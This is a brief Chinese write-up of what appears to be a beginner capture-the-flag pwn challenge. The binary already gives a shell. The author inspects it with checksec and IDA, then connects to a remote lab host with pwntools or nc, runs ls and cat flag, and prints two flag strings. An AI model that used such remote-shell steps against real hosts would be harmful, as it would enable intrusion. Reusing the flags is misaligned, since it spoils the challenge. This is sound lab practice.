方法一:
1、下载文件并开启靶机
2、在Linux中查看该文件信息
checksec 1
3、该文件是64位的文件,我们用64位IDA打开该文件
3.1、shift+f12查看该文件的关键字符串
3.2、双击关键字符串,再按Ctrl+X,查看关键字符串"/bin/sh"的地址
"/bin/sh"地址:0x400574
3.3、按F5进入反编译代码区,我们看到可以直接获取shell
4、编译代码
#encoding=utf-8
from pwn import * #导入pwntools中pwn的所有内容
p = remote("111.200.241.244",50525) #链接服务器远程交互
p.interactive() #反弹shell进行交互
ls #查看是否有flag文件
#查看到有flag文件后
cat flag #读取flag文件获取flag
5、flag为:
cyberpeace{7c578602ac942d64f87139d568c4acba}
方法二:
nc -vn 111.200.241.244 50648
1.链接端口成功
2.用ls查看文件信息
3.查看flag文件里面信息
cat flag
4.flag为:
cyberpeace{9b54e8f1716eb52831fa11102357445f}